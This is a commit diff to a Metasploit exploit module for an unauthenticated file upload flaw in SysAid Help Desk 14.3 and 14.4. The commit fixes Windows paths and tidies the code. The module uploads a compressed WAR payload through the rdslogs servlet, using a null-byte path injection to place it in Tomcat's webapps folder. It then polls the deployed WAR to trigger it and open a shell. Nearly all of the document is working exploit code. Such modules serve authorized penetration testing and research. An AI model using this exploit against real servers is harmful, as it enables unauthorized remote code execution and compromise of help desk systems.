Fix paths for windows and cleanup

2015-07-17 12:09:18 -05:00 · 2015-07-17 12:09:18 -05:00 · 57c4a3387b
parent ea49fd2fdc
commit 57c4a3387b
1 changed files with 23 additions and 14 deletions
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
-      'Name'        => 'SysAid Help Desk rdslogs Arbitrary File Upload',
+      'Name'        => 'SysAid Help Desk 'rdslogs' Arbitrary File Upload',
      'Description' => %q{
        This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
        The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
@ -62,6 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
  def check
    servlet_path = 'rdslogs'
    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method' => 'POST',
@ -69,7 +70,8 @@ class Metasploit3 < Msf::Exploit::Remote
        'rdsName' => bogus_file
      }
    })
-    if res and res.code == 200
+
+    if res && res.code == 200
      return Exploit::CheckCode::Detected
    end
  end
@ -103,24 +105,31 @@ class Metasploit3 < Msf::Exploit::Remote
      'data' => Zlib::Deflate.deflate(war_payload),
      'ctype' => 'application/octet-stream',
      'vars_get' => {
-        'rdsName' => tomcat_path + app_base + ".war" + "\x00"
+        'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
      }
    })

    # The server either returns a 200 OK when the upload is successful.
-    if res and (res.code == 200)
-      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
-      " seconds for deployment")
-      register_files_for_cleanup("webapps/" + app_base + ".war")
-      sleep(datastore['SLEEP'])
+    if res && res.code == 200
+      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
+      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
    else
-      fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
+      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
    end

-    print_status("#{peer} - Executing payload, wait for session...")
-    send_request_cgi({
-      'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
-      'method' => 'GET'
-    })
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end
  end
 end